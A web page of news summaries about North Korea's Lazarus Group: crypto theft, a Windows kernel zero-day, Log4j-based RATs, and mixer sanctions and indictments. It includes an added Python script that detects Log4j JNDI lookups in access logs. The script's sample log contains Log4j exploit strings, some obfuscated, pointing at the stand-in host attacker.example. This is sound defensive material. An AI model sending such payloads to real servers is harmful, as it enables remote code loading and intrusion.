North Korean hackers have stolen over $2 billion in cryptocurrency this year, primarily targeting high-net-worth individuals, with the total regime-linked crypto theft surpassing $6 billion since 2017, funding North Korea's nuclear and missile programs, according to researchers.
Reports suggest that North Korean hackers associated with the Lazarus Group exploited Ethereum through Tornado Cash and transferred 1 ETH to BlackRock, sparking speculation and raising concerns about potential illicit activities. Tornado Cash has faced increased scrutiny from US regulators, with the US Treasury Department targeting the software for its alleged role in facilitating cybercriminal activity. Despite the rebound in Ethereum's price, the motive behind the alleged transfer remains undisclosed, and BlackRock has not responded to the matter.
The Lazarus Group exploited a recently patched Windows kernel flaw, CVE-2024-21338, as a zero-day to gain kernel-level access and disable security software on compromised hosts. This allowed them to run the FudModule rootkit, which can disable security solutions and manipulate Windows components. The attack showcases the group's technical sophistication and cross-platform focus, as they also target Apple macOS systems. This incident highlights the ongoing threat posed by the Lazarus Group as one of the most prolific and advanced persistent threat actors in the cybersecurity landscape.
The Lazarus Group, a North Korean state-sponsored cyber unit, has been using malware strains written in DLang, a memory-safe programming language, in its recent attacks. Cisco Talos discovered at least three DLang-based malware strains used in attacks on organizations in various industries. The attacks, part of "Operation Blacksmith," targeted organizations by exploiting n-day vulnerabilities, including the Log4j vulnerability. The malware strains, including NineRAT, BottomLoader, and DLRAT, exhibited similar tactics and techniques. DLang is an uncommon choice for writing malware, but there is an increasing trend among cybercriminals toward newer memory-safe languages such as Rust and DLang.
The Lazarus Group, a North Korea-linked threat actor, has launched a global campaign exploiting security flaws in Log4j to deploy previously undocumented remote access trojans (RATs) on compromised hosts. The campaign, known as Operation Blacksmith, involves the use of DLang-based malware families, including a RAT called NineRAT that utilizes Telegram for command-and-control. The Lazarus Group's tactics overlap with the sub-group Andariel, which is responsible for initial access and espionage activities. The attacks target various sectors, including manufacturing, agriculture, and physical security. The group takes advantage of the widespread use of vulnerable versions of Log4j and employs multiple tools for persistent access.
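Because Operation Blacksmith relied on widely deployed vulnerable Log4j versions, the first thing a defender usually wants is a way to find exploitation attempts in existing web logs. The following is an added example written for this page, not code from Cisco Talos or from any of the reporting summarized here. It scans Apache-style access log lines for Log4j JNDI lookup strings, undoing the two evasions most often seen in the wild: URL encoding and nested `${lower:}`/`${upper:}`/`${:-default}` lookups that spell out "jndi" piecewise. The log lines, IP addresses and the `attacker.example` host are constructed sample data.

```python
"""Detect Log4j JNDI lookup attempts in web server access logs.

Added example (not from the original page). Assumes Apache/nginx-style
combined log lines; sample lines below are constructed.
"""
import re
from typing import Dict, List
from urllib.parse import unquote

# Innermost ${...} lookup: a body with no further braces inside it.
_INNER = re.compile(r"\$\{([^{}]*)\}")

# A fully resolved JNDI lookup with one of the protocols Log4j will follow.
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nis|nds|http)\s*:", re.I
)


def _resolve_one(m: "re.Match[str]") -> str:
    """Collapse one innermost lookup to the literal it evaluates to.

    Only the layers attackers use as obfuscation are resolved (lower, upper,
    and ':-' default values). A jndi lookup is terminal and kept verbatim so
    the detector can see it; any other lookup is left untouched.
    """
    body = m.group(1)
    prefix, _sep, rest = body.partition(":")
    p = prefix.strip().lower()
    if p == "jndi":
        return m.group(0)
    if p == "lower":
        return rest.lower()
    if p == "upper":
        return rest.upper()
    if ":-" in rest:
        # ${::-j}, ${env:UNSET:-j}: the default after ':-' is what remains.
        return rest.split(":-", 1)[1]
    return m.group(0)


def normalize(s: str, max_rounds: int = 20) -> str:
    """Resolve nested obfuscation lookups from the inside out.

    Stops when nothing changes or after max_rounds, so a pathological input
    cannot keep the loop busy.
    """
    for _ in range(max_rounds):
        new = _INNER.sub(_resolve_one, s)
        if new == s:
            break
        s = new
    return s


def _url_decode(s: str, rounds: int = 2) -> str:
    """Undo up to two layers of percent-encoding (double encoding is common)."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def scan_log_lines(lines: List[str]) -> List[Dict[str, object]]:
    """Return one hit per line containing a JNDI lookup after de-obfuscation."""
    hits: List[Dict[str, object]] = []
    for lineno, raw in enumerate(lines, start=1):
        normalized = normalize(_url_decode(raw))
        m = _JNDI.search(normalized)
        if m:
            hits.append({
                "line": lineno,
                "protocol": m.group(1).lower(),
                "normalized": normalized,
                "raw": raw,
            })
    return hits


# Constructed sample log lines: one benign request, one plain JNDI payload in
# the User-Agent, one nested-lookup payload, one URL-encoded payload in the
# query string, and a benign-looking ${...} that must not trigger.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2023:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [10/Dec/2023:12:00:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - [10/Dec/2023:12:00:03 +0000] "GET /login HTTP/1.1" 200 128 "-" '
    '"${${lower:j}${upper:n}di:${::-l}dap://attacker.example/b}"',
    '10.0.0.8 - - [10/Dec/2023:12:00:04 +0000] '
    '"GET /?q=%24%7Bjndi%3Armi%3A%2F%2Fattacker.example%2Fc%7D HTTP/1.1" 404 0 "-" "curl/8.0"',
    '10.0.0.9 - - [10/Dec/2023:12:00:05 +0000] "GET /prices?sym=${price} HTTP/1.1" 200 64 "-" "-"',
]

if __name__ == "__main__":
    for hit in scan_log_lines(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['protocol']} -> {hit['normalized']}")
```

Run it against a real access log with `scan_log_lines(open(path).read().splitlines())`. The normalized string in each hit is what the vulnerable logger would have evaluated, which is usually more useful for triage than the raw obfuscated payload; the protocol field tells you whether the attempt would have used LDAP, RMI or a DNS-only callback.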
The U.S. Department of the Treasury's Office of Foreign Assets Control (OFAC) has sanctioned Sinbad.io, a virtual currency mixer used by the Lazarus Group, a state-sponsored cyber hacking group from North Korea, to launder stolen virtual currency. Sinbad has processed millions of dollars' worth of virtual currency from Lazarus Group heists and is also used for illicit activities such as sanctions evasion, drug trafficking, and the purchase of child sexual abuse materials. This designation builds on previous actions taken by OFAC to expose elements of the virtual currency ecosystem used by malicious cyber actors.
North Korean hackers associated with the Lazarus Group are combining different elements of their macOS malware campaigns, using RustBucket droppers to deliver the KANDYKORN malware. Cybersecurity firm SentinelOne has linked a third macOS-specific malware called ObjCShellz to the RustBucket campaign. The Lazarus Group is utilizing a backdoored version of a PDF reader app, SwiftLoader, to distribute KANDYKORN, demonstrating the evolving and collaborative nature of North Korean cyber threats. This tactic makes it challenging for defenders to track and attribute malicious activities. Additionally, a subgroup within Lazarus, Andariel, has been implicated in cyber attacks exploiting a security flaw in Apache ActiveMQ.
The founders of Tornado Cash, a cryptocurrency mixer, have been charged with conspiracy to commit money laundering, conspiracy to commit sanctions violations, and conspiracy to operate an unlicensed money transmitting business. Roman Storm has been arrested in Washington state, while Roman Semenov remains at large. The indictment alleges that Tornado Cash facilitated over $1 billion in money laundering transactions and laundered hundreds of millions of dollars for the sanctioned North Korean cybercrime organization, Lazarus Group. The founders knowingly operated the service, despite being aware of its use by hackers and fraudsters to conceal the proceeds of their crimes.
The FBI has issued a warning that North Korean hackers, specifically the Lazarus Group and APT38, may attempt to sell stolen bitcoin worth over $40 million. These hacker groups were responsible for various cryptocurrency hacks earlier this year, including the theft of $60 million from Alphapo and $100 million from Atomic Wallet. The FBI has identified six wallets containing a total of 1,580 bitcoin connected to these groups and advises cryptocurrency companies to avoid interacting with them. The agency vows to continue combating North Korea's illicit activities, including cybercrime and virtual currency theft.
A North Korean banker has been indicted and two cryptocurrency traders have been sanctioned for their alleged involvement in a money laundering scheme to generate revenue for North Korea's regime. The scheme involved laundering stolen cryptocurrency for the North Korea-based Lazarus Group, evading sanctions put in place by the US Treasury Department to stop the country's ballistic missile programs. North Korea has generated revenue through cryptocurrency thefts and other schemes since at least 2017, stealing an estimated $1.7 billion worth of cryptocurrency last year alone.